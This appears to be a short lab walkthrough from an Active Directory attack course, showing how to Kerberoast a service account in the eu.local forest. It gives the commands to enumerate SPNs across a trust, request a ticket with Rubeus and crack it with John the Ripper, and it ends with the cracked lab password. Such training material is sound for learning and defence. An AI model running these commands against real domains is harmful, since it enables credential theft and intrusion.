Find a service account in the eu.local forest and Kerberoast its password.
First import AD Module:
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll; Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
Enumerate named service accounts across the forests:
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server $_.Name}
eu\storagesvchas a SPNMSSQLSvc/eu-file.eu.local
To request a TGS of the above:
C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:eu-storagesvc.txt
Use klist to check the ticket:
Use john.exe to crack the password:
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\Users\studentuser64\eu-storagesvc.txt
Note: eu\storagesvc
- Password:
Qwerty@123